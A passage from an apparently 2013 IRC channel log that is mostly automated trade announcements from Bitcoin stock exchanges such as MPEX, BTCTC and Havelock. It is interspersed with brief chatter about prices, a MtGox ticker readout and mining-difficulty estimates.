0.03544 BTC [-] Aug 20 17:47:08 [MPEX] [S.MPOE] 4833 @ 0.00082259 = 3.9756 BTC [+] Aug 20 17:47:39 [BTCTC] [LABCOIN] 15 @ 0.002349 = 0.0352 BTC [-] Aug 20 17:51:06 [MPEX] [S.MPOE] 2077 @ 0.00082436 = 1.7122 BTC [+] Aug 20 17:51:13 [MPEX] [S.MPOE] 4074 @ 0.00082599 = 3.3651 BTC [+] Aug 20 17:51:14 [MPEX] [S.MPOE] 13849 @ 0.00082629 = 11.4433 BTC [+] Aug 20 17:54:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.03534 = 0.106 BTC [-] Aug 20 17:57:13 [HAVELOCK] [AM1] 1 @ 3.5101 BTC [-] Aug 20 17:57:17 [HAVELOCK] [AM1] 1 @ 3.51 BTC [-] Aug 20 18:02:03 [BTCTC] [LABCOIN] 19 @ 0.002349 = 0.0446 BTC [-] Aug 20 18:02:12 [HAVELOCK] [XBOND] 7 @ 0.001198 = 0.0084 BTC [+] Aug 20 18:02:45 [BTCTC] [LABCOIN] 22 @ 0.00235 = 0.0517 BTC [+] Aug 20 18:02:46 [BTCTC] [LABCOIN] 100 @ 0.00235 = 0.235 BTC [+] Aug 20 18:02:47 [BTCTC] [LABCOIN] 178 @ 0.002351 = 0.4185 BTC [+] Aug 20 18:03:16 [BTCTC] [LABCOIN] 14 @ 0.002336 = 0.0327 BTC [-] Aug 20 18:03:17 [BTCTC] [LABCOIN] 86 @ 0.002335 = 0.2008 BTC [-] Aug 20 18:03:34 [BTCTC] [LABCOIN] 171 @ 0.002351 = 0.402 BTC [+] Aug 20 18:03:57 [BTCTC] [ASICMINER-PT] 1 @ 3.597 BTC [+] Aug 20 18:06:29 [MPEX] [S.MPOE] 6501 @ 0.00082629 = 5.3717 BTC [+] Aug 20 18:06:31 [MPEX] [S.MPOE] 3460 @ 0.00082732 = 2.8625 BTC [+] Aug 20 18:08:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0361 BTC [+] Aug 20 18:09:15 [HAVELOCK] [SMG] 50 @ 0.000212 = 0.0106 BTC [-] Aug 20 18:09:36 [BTCTC] [KENILWORTH] 2 @ 0.001793 = 0.0036 BTC [+] Aug 20 18:09:59 [HAVELOCK] [LABCO] 2 @ 0.00185001 = 0.0037 BTC [-] Aug 20 18:10:41 [HAVELOCK] [AM100] 10 @ 0.035 = 0.35 BTC [-] Aug 20 18:13:14 [HAVELOCK] [SMG] 100 @ 0.000211 = 0.0211 BTC [-] Aug 20 18:13:17 [HAVELOCK] [SMG] 50 @ 0.000211 = 0.0106 BTC [-] Aug 20 18:13:29 [BTCTC] [ASICMINER-PT] 1 @ 3.524 BTC [-] Aug 20 18:13:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.03504 = 0.0701 BTC [-] Aug 20 18:14:00 [BTCTC] [TAT.ASICMINER] 13 @ 0.03502 = 0.4553 BTC [-] Aug 20 18:14:20 [HAVELOCK] [AM100] 5 @ 0.035 = 0.175 BTC [-] Aug 20 18:17:10 [BTCTC] [LABCOIN] 2 @ 0.002368 = 0.0047 BTC [+] Aug 20 18:17:11 [BTCTC] [LABCOIN] 18 @ 0.002369 = 0.0426 BTC [+] Aug 20 18:23:40 [BTCTC] [ASICMINER-PT] 1 @ 3.526 BTC [+] Aug 20 18:23:41 [BTCTC] [ASICMINER-PT] 2 @ 3.525 = 7.05 BTC [-] Aug 20 18:23:41 [BTCTC] [ASICMINER-PT] 1 @ 3.523 BTC [-] Aug 20 18:23:43 [BTCTC] [ASICMINER-PT] 1 @ 3.522 BTC [-] Aug 20 18:23:44 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 20 18:23:45 [BTCTC] [ASICMINER-PT] 1 @ 3.514 BTC [-] Aug 20 18:23:46 [BTCTC] [ASICMINER-PT] 3 @ 3.513 = 10.539 BTC [-] Aug 20 18:23:47 [BTCTC] [ASICMINER-PT] 6 @ 3.512 = 21.072 BTC [-] Aug 20 18:23:48 [BTCTC] [ASICMINER-PT] 1 @ 3.511 BTC [-] Aug 20 18:24:04 [BTCTC] [LABCOIN] 30 @ 0.002343 = 0.0703 BTC [-] Aug 20 18:24:23 btce makes the big leap http://charts.mql5.com/2/317/btcusd-h4-fxopen-investments-inc.png Aug 20 18:24:27 [BTCTC] [LABCOIN] 30 @ 0.002341 = 0.0702 BTC [-] Aug 20 18:24:49 [BTCTC] [LABCOIN] 399 @ 0.002336 = 0.9321 BTC [-] Aug 20 18:25:13 [BTCTC] [LABCOIN] 1 @ 0.002345 BTC [+] Aug 20 18:25:14 [BTCTC] [LABCOIN] 30 @ 0.002346 = 0.0704 BTC [+] Aug 20 18:25:49 [MPEX] [S.MPOE] 9350 @ 0.00083257 = 7.7845 BTC [+] Aug 20 18:25:51 [MPEX] [S.MPOE] 5355 @ 0.00083599 = 4.4767 BTC [+] Aug 20 18:27:37 [BTCTC] [LABCOIN] 30 @ 0.002339 = 0.0702 BTC [-] Aug 20 18:27:39 [BTCTC] [LABCOIN] 20 @ 0.002338 = 0.0468 BTC [-] Aug 20 18:27:40 [BTCTC] [LABCOIN] 101 @ 0.002336 = 0.2359 BTC [-] Aug 20 18:27:41 [BTCTC] [LABCOIN] 1605 @ 0.002335 = 3.7477 BTC [-] Aug 20 18:27:43 [BTCTC] [LABCOIN] 244 @ 0.002331 = 0.5688 BTC [-] Aug 20 18:29:44 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Aug 20 18:31:13 [BTCTC] [BASIC-MINING] 3 @ 0.31 = 0.93 BTC [-] Aug 20 18:33:11 [BTCTC] [LABCOIN] 15 @ 0.002332 = 0.035 BTC [+] Aug 20 18:33:13 [BTCTC] [LABCOIN] 30 @ 0.002332 = 0.07 BTC [+] Aug 20 18:33:13 [BTCTC] [LABCOIN] 7106 @ 0.002331 = 16.5641 BTC [-] Aug 20 18:33:14 [BTCTC] [LABCOIN] 2849 @ 0.00232 = 6.6097 BTC [-] Aug 20 18:33:48 [BTCTC] [LABCOIN] 6 @ 0.002321 = 0.0139 BTC [+] Aug 20 18:33:49 [BTCTC] [LABCOIN] 2994 @ 0.00232 = 6.9461 BTC [-] Aug 20 18:35:23 [BTCTC] [ASICMINER-PT] 1 @ 3.512 BTC [-] Aug 20 18:35:25 [BTCTC] [ASICMINER-PT] 2 @ 3.511 = 7.022 BTC [-] Aug 20 18:35:26 [BTCTC] [ASICMINER-PT] 10 @ 3.511 = 35.11 BTC [-] Aug 20 18:35:27 [BTCTC] [ASICMINER-PT] 28 @ 3.51 = 98.28 BTC [-] Aug 20 18:36:03 [MPEX] [S.MPOE] 6845 @ 0.00083765 = 5.7337 BTC [+] Aug 20 18:37:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.03578 = 0.3578 BTC [+] Aug 20 18:39:59 [BTCTC] [LABCOIN] 6 @ 0.002323 = 0.0139 BTC [+] Aug 20 18:40:00 [BTCTC] [LABCOIN] 20 @ 0.002322 = 0.0464 BTC [-] Aug 20 18:40:01 [BTCTC] [LABCOIN] 4231 @ 0.00232 = 9.8159 BTC [-] Aug 20 18:40:01 [BTCTC] [LABCOIN] 1700 @ 0.00232 = 3.944 BTC [-] Aug 20 18:40:02 [BTCTC] [LABCOIN] 25 @ 0.00232 = 0.058 BTC [-] Aug 20 18:40:12 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 20 18:40:14 [BTCTC] [ASICMINER-PT] 18 @ 3.509 = 63.162 BTC [-] Aug 20 18:40:36 [HAVELOCK] [SDSTM] 1 @ 0.0034 BTC [-] Aug 20 18:41:46 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [-] Aug 20 18:42:04 [BTCTC] [LABCOIN] 195 @ 0.00232 = 0.4524 BTC [-] Aug 20 18:42:05 [BTCTC] [LABCOIN] 3 @ 0.00232 = 0.007 BTC [-] Aug 20 18:42:06 [BTCTC] [LABCOIN] 680 @ 0.00232 = 1.5776 BTC [-] Aug 20 18:42:08 [BTCTC] [LABCOIN] 50 @ 0.002311 = 0.1156 BTC [-] Aug 20 18:42:08 [BTCTC] [LABCOIN] 50 @ 0.002305 = 0.1153 BTC [-] Aug 20 18:42:09 [BTCTC] [LABCOIN] 4331 @ 0.002304 = 9.9786 BTC [-] Aug 20 18:42:35 [BTCTC] [LABCOIN] 600 @ 0.002302 = 1.3812 BTC [-] Aug 20 18:43:10 [BTCTC] [DMS.MINING] 8 @ 0.0033 = 0.0264 BTC [-] Aug 20 18:43:16 [HAVELOCK] [SDSTM] 1 @ 0.0034 BTC [-] Aug 20 18:44:55 [HAVELOCK] [SDSTM] 5 @ 0.0034 = 0.017 BTC [-] Aug 20 18:45:15 [BTCTC] [ASICMINER-PT] 1 @ 3.514 BTC [+] Aug 20 18:45:17 [BTCTC] [ASICMINER-PT] 1 @ 3.513 BTC [-] Aug 20 18:45:24 [BTCTC] [ASICMINER-PT] 16 @ 3.511 = 56.176 BTC [-] Aug 20 18:46:19 [BTCTC] [ASICMINER-PT] 1 @ 3.512 BTC [+] Aug 20 18:46:19 [BTCTC] [ASICMINER-PT] 1 @ 3.511 BTC [-] Aug 20 18:46:21 [BTCTC] [ASICMINER-PT] 4 @ 3.509 = 14.036 BTC [-] Aug 20 18:46:30 [HAVELOCK] [SDSTM] 6 @ 0.0034 = 0.0204 BTC [-] Aug 20 18:46:57 [HAVELOCK] [XBOND] 4980 @ 0.001198 = 5.966 BTC [+] Aug 20 18:50:03 [HAVELOCK] [XBOND] 2 @ 0.001199 = 0.0024 BTC [+] Aug 20 18:50:08 [MPEX] [S.BBET] 5831 @ 0.00065998 = 3.8483 BTC [-] Aug 20 18:52:49 [HAVELOCK] [XBOND] 20 @ 0.001198 = 0.024 BTC [-] Aug 20 18:53:13 Am on sale again Aug 20 18:55:06 [BTCTC] [LABCOIN] 2 @ 0.0023 = 0.0046 BTC [-] Aug 20 18:55:08 [BTCTC] [LABCOIN] 1 @ 0.002245 BTC [-] Aug 20 18:56:21 [BTCTC] [COGNITIVE] 2 @ 0.328 = 0.656 BTC [-] Aug 20 18:56:22 [BTCTC] [COGNITIVE] 1 @ 0.328 BTC [-] Aug 20 18:56:24 [BTCTC] [COGNITIVE] 1 @ 0.3272 BTC [-] Aug 20 18:56:35 a never ending sale! 20% off today, 40% off tomorrow! Aug 20 18:57:12 WOOOOOOOO Aug 20 18:57:23 nothing quite like 10% off a day forever Aug 20 18:58:34 better to hold off, it will be trading around 3 bucks mid next week Aug 20 18:58:47 who what? Aug 20 18:58:51 and when Aug 20 19:01:30 AM Aug 20 19:02:18 amethyst? Aug 20 19:02:23 haha Aug 20 19:02:31 Amethyst cant go down Aug 20 19:02:34 Its too strong Aug 20 19:02:40 also a 400% yield Aug 20 19:02:41 come on Aug 20 19:03:30 lol Aug 20 19:04:28 [BTCTC] [DMS.MINING] 4 @ 0.0033 = 0.0132 BTC [-] Aug 20 19:06:06 [BTCTC] [DMS.MINING] 53 @ 0.003225 = 0.1709 BTC [-] Aug 20 19:06:13 [BTCTC] [DMS.MINING] 4 @ 0.003223 = 0.0129 BTC [-] Aug 20 19:06:15 [BTCTC] [DMS.MINING] 8 @ 0.003219 = 0.0258 BTC [-] Aug 20 19:06:21 [BTCTC] [DMS.MINING] 5 @ 0.003211 = 0.0161 BTC [-] Aug 20 19:06:24 [BTCTC] [DMS.MINING] 140 @ 0.0032 = 0.448 BTC [-] Aug 20 19:06:25 [BTCTC] [DMS.MINING] 40 @ 0.0032 = 0.128 BTC [-] Aug 20 19:09:50 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [+] Aug 20 19:10:17 [BTCTC] [LABCOIN] 7 @ 0.002278 = 0.0159 BTC [-] Aug 20 19:10:18 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [+] Aug 20 19:10:19 [BTCTC] [LABCOIN] 78 @ 0.002279 = 0.1778 BTC [+] Aug 20 19:11:15 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [+] Aug 20 19:11:16 [BTCTC] [LABCOIN] 85 @ 0.002279 = 0.1937 BTC [+] Aug 20 19:11:42 [BTCTC] [ASICMINER-PT] 1 @ 3.555 BTC [+] Aug 20 19:11:56 [BTCTC] [LABCOIN] 30 @ 0.002279 = 0.0684 BTC [+] Aug 20 19:12:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.03501 = 1.0503 BTC [-] Aug 20 19:12:13 [BTCTC] [TAT.ASICMINER] 96 @ 0.035 = 3.36 BTC [-] Aug 20 19:12:25 [BTCTC] [LABCOIN] 20 @ 0.002278 = 0.0456 BTC [-] Aug 20 19:14:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001243 BTC [+] Aug 20 19:14:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [-] Aug 20 19:16:15 [BTCTC] [LABCOIN] 30 @ 0.002296 = 0.0689 BTC [+] Aug 20 19:16:46 [BTCTC] [LABCOIN] 30 @ 0.002296 = 0.0689 BTC [+] Aug 20 19:17:19 [BTCTC] [LABCOIN] 30 @ 0.002296 = 0.0689 BTC [+] Aug 20 19:17:49 [BTCTC] [LABCOIN] 15 @ 0.002296 = 0.0344 BTC [+] Aug 20 19:18:01 [BTCTC] [BASIC-MINING] 1 @ 0.2876 BTC [-] Aug 20 19:18:15 [BTCTC] [LABCOIN] 6 @ 0.002296 = 0.0138 BTC [+] Aug 20 19:19:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.03612 BTC [+] Aug 20 19:21:19 [BTCTC] [TAT.ASICMINER] 33 @ 0.035 = 1.155 BTC [-] Aug 20 19:21:46 [BTCTC] [LABCOIN] 30 @ 0.002274 = 0.0682 BTC [-] Aug 20 19:22:15 [BTCTC] [LABCOIN] 1 @ 0.002273 BTC [-] Aug 20 19:22:16 [BTCTC] [LABCOIN] 29 @ 0.002274 = 0.0659 BTC [+] Aug 20 19:22:29 [HAVELOCK] [XBOND] 5 @ 0.001198 = 0.006 BTC [-] Aug 20 19:24:02 [BTCTC] [LABCOIN] 7 @ 0.00232 = 0.0162 BTC [+] Aug 20 19:24:03 [BTCTC] [LABCOIN] 3 @ 0.002324 = 0.007 BTC [+] Aug 20 19:24:05 [BTCTC] [LABCOIN] 2990 @ 0.002327 = 6.9577 BTC [+] Aug 20 19:24:17 [BTCTC] [HOSTED-MINING] 4 @ 0.2798 = 1.1192 BTC [+] Aug 20 19:24:19 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 20 19:24:20 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 20 19:25:27 [BTCTC] [LABCOIN] 30 @ 0.002325 = 0.0698 BTC [-] Aug 20 19:25:29 [BTCTC] [LABCOIN] 55 @ 0.002326 = 0.1279 BTC [+] Aug 20 19:25:30 [BTCTC] [LABCOIN] 1341 @ 0.002327 = 3.1205 BTC [+] Aug 20 19:25:31 [BTCTC] [LABCOIN] 484 @ 0.002329 = 1.1272 BTC [+] Aug 20 19:25:32 [BTCTC] [LABCOIN] 3090 @ 0.00233 = 7.1997 BTC [+] Aug 20 19:26:00 [BTCTC] [LABCOIN] 15 @ 0.002329 = 0.0349 BTC [-] Aug 20 19:26:02 [BTCTC] [LABCOIN] 1985 @ 0.00233 = 4.6251 BTC [+] Aug 20 19:26:12 [BTCTC] [DMS.PURCHASE] 2 @ 0.02061 = 0.0412 BTC [-] Aug 20 19:27:16 [BTCTC] [LABCOIN] 20 @ 0.002328 = 0.0466 BTC [-] Aug 20 19:27:16 [BTCTC] [LABCOIN] 6 @ 0.002329 = 0.014 BTC [+] Aug 20 19:27:17 [BTCTC] [LABCOIN] 2054 @ 0.00233 = 4.7858 BTC [+] Aug 20 19:28:19 [BTCTC] [LABCOIN] 2 @ 0.00233 = 0.0047 BTC [+] Aug 20 19:33:38 [BTCTC] [LABCOIN] 213 @ 0.00233 = 0.4963 BTC [+] Aug 20 19:35:02 [BTCTC] [DMS.MINING] 25 @ 0.00329 = 0.0823 BTC [+] Aug 20 19:35:37 [BTCTC] [TAT.VIRTUALMINE] 551 @ 0.001249 = 0.6882 BTC [+] Aug 20 19:37:52 [BTCTC] [TAT.ASICMINER] 13 @ 0.03591 = 0.4668 BTC [+] Aug 20 19:42:55 https://pbs.twimg.com/media/BSICVDICAAA7wz-.jpg:large Aug 20 19:43:20 [BTCTC] [TAT.ASICMINER] 50 @ 0.035 = 1.75 BTC [-] Aug 20 19:46:20 [BTCTC] [LABCOIN] 20 @ 0.002385 = 0.0477 BTC [+] Aug 20 19:46:35 [BTCTC] [LABCOIN] 30 @ 0.002386 = 0.0716 BTC [+] Aug 20 19:46:49 [BTCTC] [LABCOIN] 6 @ 0.0024 = 0.0144 BTC [+] Aug 20 19:49:14 [BTCTC] [TAT.ASICMINER] 105 @ 0.035 = 3.675 BTC [-] Aug 20 19:50:10 [MPEX] [S.MPOE] 5341 @ 0.00083016 = 4.4339 BTC [-] Aug 20 19:56:30 [BTCTC] [ACTIVEMINING] 30 @ 0.005251 = 0.1575 BTC [+] Aug 20 19:56:32 [BTCTC] [ACTIVEMINING] 1000 @ 0.00525 = 5.25 BTC [-] Aug 20 19:57:40 [HAVELOCK] [XBOND] 1 @ 0.001194 BTC [-] Aug 20 19:57:58 [MPEX] [S.MPOE] 809 @ 0.000832 = 0.6731 BTC [+] Aug 20 19:57:59 [MPEX] [S.MPOE] 103 @ 0.00082988 = 0.0855 BTC [-] Aug 20 19:58:50 [HAVELOCK] [SMG] 50 @ 0.000211 = 0.0106 BTC [-] Aug 20 19:58:54 [HAVELOCK] [SMG] 100 @ 0.00021 = 0.021 BTC [-] Aug 20 19:59:48 [HAVELOCK] [SMG] 9 @ 0.000201 = 0.0018 BTC [-] Aug 20 19:59:52 [HAVELOCK] [SMG] 4 @ 0.00020001 = 0.0008 BTC [-] Aug 20 19:59:56 [HAVELOCK] [SMG] 3 @ 0.00020001 = 0.0006 BTC [-] Aug 20 19:59:59 [HAVELOCK] [SMG] 184 @ 0.0002 = 0.0368 BTC [-] Aug 20 20:03:36 [BTCTC] [BFMINES] 1 @ 0.0011 BTC [-] Aug 20 20:03:54 [BTCTC] [BFMINES] 2 @ 0.001101 = 0.0022 BTC [+] Aug 20 20:04:47 [BTCTC] [BFMINES] 1 @ 0.001101 BTC [+] Aug 20 20:05:29 [BTCTC] [BFMINES] 1 @ 0.001775 BTC [+] Aug 20 20:06:12 [BTCTC] [DMS.PURCHASE] 24 @ 0.02061 = 0.4946 BTC [-] Aug 20 20:06:29 [BTCTC] [BASIC-MINING] 1 @ 0.2881 BTC [+] Aug 20 20:08:32 [BTCTC] [BASIC-MINING] 4 @ 0.2881 = 1.1524 BTC [+] Aug 20 20:10:38 [HAVELOCK] [AM100] 1 @ 0.0358 BTC [+] Aug 20 20:14:15 [BTCTC] [BASIC-MINING] 2 @ 0.288 = 0.576 BTC [-] Aug 20 20:14:17 [BTCTC] [BASIC-MINING] 11 @ 0.2879 = 3.1669 BTC [-] Aug 20 20:14:18 [BTCTC] [BASIC-MINING] 1 @ 0.2877 BTC [-] Aug 20 20:14:19 [BTCTC] [BASIC-MINING] 6 @ 0.2875 = 1.725 BTC [-] Aug 20 20:14:20 [BTCTC] [BASIC-MINING] 16 @ 0.2874 = 4.5984 BTC [-] Aug 20 20:14:22 [BTCTC] [BASIC-MINING] 18 @ 0.2873 = 5.1714 BTC [-] Aug 20 20:27:36 [HAVELOCK] [XBOND] 170 @ 0.001194 = 0.203 BTC [-] Aug 20 20:29:30 [HAVELOCK] [SMG] 16 @ 0.0002 = 0.0032 BTC [-] Aug 20 20:29:33 [MPEX] [S.MPOE] 6400 @ 0.00082583 = 5.2853 BTC [-] Aug 20 20:29:35 [HAVELOCK] [SMG] 1 @ 0.00019826 BTC [-] Aug 20 20:29:37 [HAVELOCK] [SMG] 1 @ 0.00019825 BTC [-] Aug 20 20:29:40 [HAVELOCK] [SMG] 3 @ 0.00019466 = 0.0006 BTC [-] Aug 20 20:29:44 [HAVELOCK] [SMG] 10 @ 0.00019 = 0.0019 BTC [-] Aug 20 20:29:48 [HAVELOCK] [SMG] 50 @ 0.000189 = 0.0095 BTC [-] Aug 20 20:29:52 [HAVELOCK] [SMG] 40 @ 0.00018701 = 0.0075 BTC [-] Aug 20 20:29:55 [HAVELOCK] [SMG] 20 @ 0.00018689 = 0.0037 BTC [-] Aug 20 20:29:59 [HAVELOCK] [SMG] 37 @ 0.000185 = 0.0068 BTC [-] Aug 20 20:30:03 [HAVELOCK] [SMG] 10 @ 0.000184 = 0.0018 BTC [-] Aug 20 20:30:06 [HAVELOCK] [SMG] 45 @ 0.00018321 = 0.0082 BTC [-] Aug 20 20:30:10 [HAVELOCK] [SMG] 2 @ 0.00018111 = 0.0004 BTC [-] Aug 20 20:30:13 [HAVELOCK] [SMG] 20 @ 0.00018 = 0.0036 BTC [-] Aug 20 20:30:16 [HAVELOCK] [SMG] 395 @ 0.0001792 = 0.0708 BTC [-] Aug 20 20:32:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03549 BTC [+] Aug 20 20:32:12 [HAVELOCK] [SMG] 698 @ 0.0001794 = 0.1252 BTC [+] Aug 20 20:32:16 [HAVELOCK] [SMG] 698 @ 0.0001793 = 0.1252 BTC [-] Aug 20 20:32:20 [HAVELOCK] [SMG] 604 @ 0.0001793 = 0.1083 BTC [-] Aug 20 20:34:25 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [+] Aug 20 20:36:20 [BTCTC] [DMS.MINING] 50 @ 0.00329 = 0.1645 BTC [+] Aug 20 20:38:28 [BTCTC] [DMS.MINING] 70 @ 0.00329 = 0.2303 BTC [+] Aug 20 20:38:47 [BTCTC] [LABCOIN] 2 @ 0.002429 = 0.0049 BTC [+] Aug 20 20:38:48 [BTCTC] [LABCOIN] 60 @ 0.002429 = 0.1457 BTC [+] Aug 20 20:38:50 [BTCTC] [LABCOIN] 73 @ 0.002429 = 0.1773 BTC [+] Aug 20 20:40:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.03548 = 0.2484 BTC [-] Aug 20 20:40:33 [BTCTC] [DMS.MINING] 28 @ 0.00329 = 0.0921 BTC [+] Aug 20 20:41:47 ;;ticker Aug 20 20:41:47 MtGox BTCUSD ticker | Best bid: 119.60000, Best ask: 120.20197, Bid-ask spread: 0.60197, Last trade: 119.60000, 24 hour volume: 21755.31144283, 24 hour low: 116.63954, 24 hour high: 123.01111, 24 hour vwap: 120.33585 Aug 20 20:42:06 .d Aug 20 20:42:08 50810339.04828 | Next Diff in 787 blocks | Estimated Change: 22.2484% in 4d 5h 59m 15s Aug 20 20:43:18 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [+] Aug 20 20:43:32 [BTCTC] [LABCOIN] 475 @ 0.00243 = 1.1543 BTC [+] Aug 20 20:46:22 [BTCTC] [DMS.SELLING] 50 @ 0.01778 = 0.889 BTC [+] Aug 20 20:46:24 [BTCTC] [DMS.SELLING] 12 @ 0.01779 = 0.2135 BTC [+] Aug 20 20:46:25 [BTCTC] [DMS.SELLING] 20 @ 0.01782 = 0.3564 BTC [+] Aug 20 20:46:26 [BTCTC] [DMS.SELLING] 1308 @ 0.01792 = 23.4394 BTC [+] Aug 20 20:51:08 [BTCTC] [BTC-GROWTH] 13 @ 0.0971 = 1.2623 BTC [-] Aug 20 20:52:52 [BTCTC] [ACTIVEMINING] 27 @ 0.005211 = 0.1407 BTC [-] Aug 20 20:52:54 [BTCTC] [ACTIVEMINING] 61 @ 0.00521 = 0.3178 BTC [-] Aug 20 20:52:55 [BTCTC] [ACTIVEMINING] 300 @ 0.0052 = 1.56 BTC [-] Aug 20 20:53:46 .d Aug 20 20:53:46 50810339.04828 | Next Diff in 784 blocks | Estimated Change: 22.4285% in 4d 5h 19m 52s Aug 20 20:55:43 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 20 20:55:47 [BTCTC] [DMS.PURCHASE] 20 @ 0.0206 = 0.412 BTC [-] Aug 20 20:55:49 [BTCTC] [DMS.PURCHASE] 30 @ 0.0206 = 0.618 BTC [-] Aug 20 20:57:45 [BTCTC] [ASICMINER-PT] 2 @ 3.557 = 7.114 BTC [-] Aug 20 20:57:47 [BTCTC] [ASICMINER-PT] 1 @ 3.556 BTC [-] Aug 20 20:57:48 [BTCTC] [ASICMINER-PT] 3 @ 3.524 = 10.572 BTC [-] Aug 20 20:58:41 [BTCTC] [LABCOIN] 1000 @ 0.002429 = 2.429 BTC [-] Aug 20 20:59:32 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 20 21:01:01 [HAVELOCK] [AM100] 20 @ 0.035 = 0.7 BTC [-] Aug 20 21:03:21 [BTCTC] [BTC-GROWTH] 12 @ 0.0972 = 1.1664 BTC [+] Aug 20 21:04:17 [BTCTC] [BTC-GROWTH] 38 @ 0.0972 = 3.6936 BTC [+] Aug 20 21:08:18 [BTCTC] [BTC-GROWTH] 10 @ 0.0996 = 0.996 BTC [+] Aug 20 21:08:20 [BTCTC] [BTC-GROWTH] 73 @ 0.09978 = 7.2839 BTC [+] Aug 20 21:08:21 [BTCTC] [BTC-GROWTH] 17 @ 0.09979 = 1.6964 BTC [+] Aug 20 21:08:47 [BTCTC] [DMS.MINING] 127 @ 0.00329 = 0.4178 BTC [+] Aug 20 21:08:48 [BTCTC] [DMS.MINING] 37 @ 0.0033 = 0.1221 BTC [+] Aug 20 21:08:50 [BTCTC] [DMS.MINING] 25 @ 0.0033 = 0.0825 BTC [+] Aug 20 21:08:51 [BTCTC] [DMS.MINING] 40 @ 0.0033 = 0.132 BTC [+] Aug 20 21:08:52 [BTCTC] [DMS.MINING] 114 @ 0.0033 = 0.3762 BTC [+] Aug 20 21:08:53 [BTCTC] [DMS.MINING] 10 @ 0.003325 = 0.0333 BTC [+] Aug 20 21:08:54 [BTCTC] [DMS.MINING] 22 @ 0.00333 = 0.0733 BTC [+] Aug 20 21:11:32 [BTCTC] [DMS.PURCHASE] 10 @ 0.0206 = 0.206 BTC [-] Aug 20 21:15:31 [BTCTC] [DMS.MINING] 2 @ 0.00332 = 0.0066 BTC [-] Aug 20 21:17:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005213 BTC [+] Aug 20 21:18:53 [BTCTC] [LABCOIN] 2000 @ 0.00242 = 4.84 BTC [-] Aug 20 21:19:18 [BTCTC] [BTC-GROWTH] 10 @ 0.0971 = 0.971 BTC [-] Aug 20 21:22:57 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.001485 = 0.0089 BTC [+] Aug 20 21:25:59 [BTCTC] [DMS.MINING] 10 @ 0.00332 = 0.0332 BTC [-] Aug 20 21:27:07 [BTCTC] [DMS.MINING] 2 @ 0.00332 = 0.0066 BTC [-] Aug 20 21:27:18 [BTCTC] [DMS.MINING] 4 @ 0.00332 = 0.0133 BTC [-] Aug 20 21:27:58 [HAVELOCK] [LABCO] 500 @ 0.0023 = 1.15 BTC [+] Aug 20 21:28:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001499 BTC [+] Aug 20 21:30:44 [HAVELOCK] [XBOND] 100 @ 0.001194 = 0.1194 BTC [-] Aug 20 21:31:24 [HAVELOCK] [AM100] 1 @ 0.035 BTC [-] Aug 20 21:32:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0353 BTC [-] Aug 20 21:32:22 [HAVELOCK] [XBOND] 200 @ 0.001194 = 0.2388 BTC [-] Aug 20 21:33:02 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 20 21:33:39 [HAVELOCK] [AM100] 1 @ 0.0358 BTC [+] Aug 20 21:34:14 [HAVELOCK] [SDSTM] 5 @ 0.00559 = 0.028 BTC [+] Aug 20 21:34:34 [HAVELOCK] [XBOND] 100 @ 0.001194 = 0.1194 BTC [-] Aug 20 21:35:26 [BTCTC] [DMS.SELLING] 5 @ 0.0179 = 0.0895 BTC [-] Aug 20 21:36:10 [BTCTC] [LABCOIN] 20 @ 0.002399 = 0.048 BTC [-] Aug 20 21:36:12 [HAVELOCK] [AM100] 5 @ 0.0358 = 0.179 BTC [+] Aug 20 21:36:24 [BTCTC] [LABCOIN] 30 @ 0.002335 = 0.0701 BTC [-] Aug 20 21:36:26 [BTCTC] [LABCOIN] 55 @ 0.002334 = 0.1284 BTC [-] Aug 20 21:37:27 [HAVELOCK] [SMG] 200 @ 0.00025 = 0.05 BTC [+] Aug 20 21:38:08 [HAVELOCK] [AM100] 4 @ 0.0358 = 0.1432 BTC [+] Aug 20 21:38:36 [HAVELOCK] [XBOND] 2 @ 0.00113 = 0.0023 BTC [-] Aug 20 21:38:39 [HAVELOCK] [XBOND] 475 @ 0.00112 = 0.532 BTC [-] Aug 20 21:38:43 [HAVELOCK] [XBOND] 1 @ 0.0011011 BTC [-] Aug 20 21:38:46 [HAVELOCK] [XBOND] 893 @ 0.0011 = 0.9823 BTC [-] Aug 20 21:38:49 [HAVELOCK] [XBOND] 1 @ 0.001075 BTC [-] Aug 20 21:38:53 [HAVELOCK] [XBOND] 128 @ 0.00107 = 0.137 BTC [-] Aug 20 21:42:21 [BTCTC] [DMS.MINING] 7 @ 0.00324 = 0.0227 BTC [-] Aug 20 21:43:04 [BTCTC] [DMS.MINING] 117 @ 0.003225 = 0.3773 BTC [-] Aug 20 21:43:17 [HAVELOCK] [SDSTM] 5 @ 0.00559 = 0.028 BTC [+] Aug 20 21:44:25 [BTCTC] [DMS.MINING] 9 @ 0.003201 = 0.0288 BTC [-] Aug 20 21:45:15 [BTCTC] [DMS.MINING] 36 @ 0.0032 = 0.1152 BTC [-] Aug 20 21:52:03 [BTCTC] [DMS.MINING] 9 @ 0.00325 = 